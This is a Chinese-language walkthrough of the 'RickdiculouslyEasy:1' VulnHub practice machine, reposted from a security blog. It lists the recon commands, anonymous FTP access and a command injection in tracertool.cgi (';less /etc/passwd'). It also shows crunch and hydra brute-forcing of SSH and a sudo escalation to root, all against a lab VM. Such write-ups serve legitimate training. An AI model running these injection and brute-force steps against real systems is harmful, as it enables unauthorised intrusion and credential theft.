OSCP难度靶机之RickdiculouslyEasy:1

admin 2022年10月24日00:57:54评论121 views字数 1468阅读4分53秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/虚拟机简介:这是一个非常简单的 Rick and Morty 主题引导目标:10个flag级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.124.0/24

OSCP难度靶机之RickdiculouslyEasy:1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.124.5

查看开放如下端口,并且21端口允许匿名登录,在13337端口中获取到第一个flag

OSCP难度靶机之RickdiculouslyEasy:1

OSCP难度靶机之RickdiculouslyEasy:1

2、渗透测试

2.1 服务渗透

1.访问ftp服务

ftp 192.168.124.5

OSCP难度靶机之RickdiculouslyEasy:1

2.查看第二个flag

OSCP难度靶机之RickdiculouslyEasy:1

3.nc连接6000端口

nc 192.168.124.5 60000
cat FLAG.txt

OSCP难度靶机之RickdiculouslyEasy:1

2.2 WEB渗透

1.9090端口测试

查看该端口信息,获取到第三个flag

OSCP难度靶机之RickdiculouslyEasy:1

2.80端口测试

未发现有用信息

OSCP难度靶机之RickdiculouslyEasy:1

3.目录扫描测试

dirb http://192.168.124.5

发现有目录和robots文件

OSCP难度靶机之RickdiculouslyEasy:1

4.查看passwords目录

OSCP难度靶机之RickdiculouslyEasy:1

访问FLAG.txt文件,获取到第四个flag

OSCP难度靶机之RickdiculouslyEasy:1

访问passwords.html页面中,查看网页源代码获取到密码

OSCP难度靶机之RickdiculouslyEasy:1

5.查看robots.txt文件

OSCP难度靶机之RickdiculouslyEasy:1

测试在tracertool.cgi中可以执行命令

OSCP难度靶机之RickdiculouslyEasy:1

测试可以绕过命令执行

OSCP难度靶机之RickdiculouslyEasy:1

6.查看passwd文件

;less /etc/passwd

发现标红的三个账号是有登录权限

OSCP难度靶机之RickdiculouslyEasy:1

2.3 主机渗透

1.登录主机

使用Summer作为账号,winter作为密码可成功登录主机

ssh [email protected] -p 22222

OSCP难度靶机之RickdiculouslyEasy:1

2.查看当前目录文件

使用more进行查看获取到flag

OSCP难度靶机之RickdiculouslyEasy:1

在Morty目录中发现存在2个文件

OSCP难度靶机之RickdiculouslyEasy:1

在RickSanchez目录中发现一个可执行文件和TXT文件

OSCP难度靶机之RickdiculouslyEasy:1

3.Morty目录文件

复制Morty目录文件到本地

scp -P 22222 [email protected]:/home/Morty/journal.txt.zip .
scp -P 22222 [email protected]:/home/Morty/Safe_Password.jpg .

OSCP难度靶机之RickdiculouslyEasy:1

查看图片中包含的字符串内容,提示密码为:Meeseek

strings Safe_Password.jpg

OSCP难度靶机之RickdiculouslyEasy:1

解压zip文件,获取到flag信息,并提示flag内容为131333

unzip journal.txt.zip
cat journal.txt

OSCP难度靶机之RickdiculouslyEasy:1

4.Rick目录文件

复制RICKS_SAFE目录中的safe文件到tmp目录中

cp safe /tmp/

OSCP难度靶机之RickdiculouslyEasy:1

./safe
./safe 131333

根据提示需要传入一串内容,尝试使用获取到的上个131333内容,获取到flag信息。

OSCP难度靶机之RickdiculouslyEasy:1

根据上面密码提示信息:有一个是大写的字母、一个数字、还有一个单词为为Rich喜欢的乐队名字

5.密码破解

根据搜索获取到Rich乐队名称为the flesh curtains

OSCP难度靶机之RickdiculouslyEasy:1

使用crunch生成密码

crunch 10 10 -t ,%Curtains -O >> dict.txt
crunch 7 7 -t ,%Flesh -O >> dict.txt

OSCP难度靶机之RickdiculouslyEasy:1

使用hydra进行爆破

hydra -l RickSanchez -P dict.txt 192.168.124.5 ssh  -s  22222

OSCP难度靶机之RickdiculouslyEasy:1

3、提权

3.1 系统提权

1.使用RickSanchez登录

su - RickSanchez
sudo -l

OSCP难度靶机之RickdiculouslyEasy:1

2.获取到flag

sudo su
cd /root
more FLAG.txt

OSCP难度靶机之RickdiculouslyEasy:1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之RickdiculouslyEasy:1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月24日00:57:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之RickdiculouslyEasy:1http://cn-sec.com/archives/1367224.html

发表评论

匿名网友 填写信息